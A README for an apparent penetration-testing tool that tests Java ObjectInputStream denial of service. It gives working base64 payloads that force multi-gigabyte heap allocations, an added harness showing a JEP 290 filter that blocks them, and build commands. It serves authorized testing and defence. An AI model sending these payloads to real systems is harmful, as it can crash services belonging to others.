ObjectInputStream DoS

Project to safely test the Java serialization DoS vulnerability: short serialized streams that make ObjectInputStream allocate gigabytes of heap before a single element is read, so deserialization fails with an OutOfMemoryError.

Provided as-is, for self-assessment, agreed-upon penetration-testing engagements and similar authorized use only.

Basic Scenarios

Payloads for 8GB heap consumption

Each payload declares an array or collection length of 0x7FFFFFF7 (Integer.MAX_VALUE - 8, close to the largest array the JVM accepts). ObjectInputStream allocates the backing array as soon as it reads the length field, which at 4 bytes per compressed reference is roughly 8GB, so the allocation exceeds the heap configured on most application servers and triggers an OutOfMemoryError. That should be enough to test the vulnerability in most app servers.

Generic (9 bytes; a TC_PROXYCLASSDESC record declaring 0x7FFFFFF7 interfaces):

rO0ABX1////3

Nested Object[] (44 bytes):

rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c=

Nested ArrayList (67 bytes):

rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHB////3dwR////3cHBwcHBwcHBwcA==

Nested HashMap (110 bytes):

rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABBAAAAAc3EAfgAAP0AAAAAAAAx3CAAAABBAAAAAcHB4cHg=
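The following harness is an added example and not part of the oisdos project. It feeds the "Nested Object[]" payload above to ObjectInputStream twice: once with a JEP 290 deserialization filter (java.io.ObjectInputFilter, Java 9 or later) that caps array lengths, and once without. The class name, the filter pattern and its limit values are assumptions chosen for illustration; tune the limits to the application's real data.

```java
// Added example (not the oisdos project's code): run one README payload through
// ObjectInputStream with and without a JEP 290 filter. Requires Java 9+.
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.util.Base64;

public class OisDosCheck {

    // "Nested Object[]" payload from the README: TC_ARRAY of [Ljava.lang.Object;
    // whose declared length is 0x7FFFFFF7. No elements follow the length field;
    // the JVM allocates the whole array before it would read the first one.
    static final String OBJECT_ARRAY_PAYLOAD =
        "rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cH////c=";

    // Limits-only filter pattern (assumed values): arrays above 100,000 elements
    // and nesting deeper than 20 are rejected. A production filter should also
    // allow-list the expected classes, e.g. "maxarray=100000;com.example.**;!*".
    static final String FILTER_PATTERN = "maxarray=100000;maxdepth=20";

    /** Attempts to deserialize the payload; returns a one-line outcome. */
    static String deserialize(byte[] payload, ObjectInputFilter filter) {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(payload))) {
            if (filter != null) {
                // Must be installed before the first readObject() call.
                ois.setObjectInputFilter(filter);
            }
            Object o = ois.readObject();
            return "deserialized " + o.getClass().getName();
        } catch (InvalidClassException e) {
            // A REJECTED filter status surfaces as InvalidClassException("filter status: REJECTED").
            return "rejected by filter: " + e.getMessage();
        } catch (OutOfMemoryError e) {
            // The allocation itself failed; nothing was allocated, so catching here is safe.
            return "OutOfMemoryError: " + e.getMessage();
        } catch (IOException | ClassNotFoundException e) {
            return "stream error: " + e;
        }
    }

    public static void main(String[] args) {
        byte[] payload = Base64.getDecoder().decode(OBJECT_ARRAY_PAYLOAD);

        // 1. Filtered: the length 0x7FFFFFF7 exceeds maxarray, so the stream is
        //    rejected before any array is allocated.
        ObjectInputFilter filter = ObjectInputFilter.Config.createFilter(FILTER_PATTERN);
        System.out.println("filtered:   " + deserialize(payload, filter));

        // 2. Unfiltered: the JVM tries to allocate ~8GB for the array.
        //    Run with e.g. -Xmx512m to watch it fail.
        System.out.println("unfiltered: " + deserialize(payload, null));
    }
}
```

Compile and run with `javac OisDosCheck.java && java -Xmx512m OisDosCheck`. The same limits can be applied JVM-wide without code changes through the `jdk.serialFilter` system property (`-Djdk.serialFilter="maxarray=100000;maxdepth=20"`), which is the usual remediation for an application server. Results differ by JDK version: a payload that does not produce an OutOfMemoryError shows only that this particular allocation was refused, not that deserialization of untrusted input is safe.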

Payloads for collision attacks

Build & Run

mvn clean package

java -Xmx25g -jar target/oisdos-1.0.jar

E.g. (the first argument selects the scenario; some scenarios take a numeric argument):

java -Xmx25g -jar target/oisdos-1.0.jar Generic

java -Xmx25g -jar target/oisdos-1.0.jar ArrayListHeap

java -Xmx25g -jar target/oisdos-1.0.jar HashtableCollisions 5000

Other info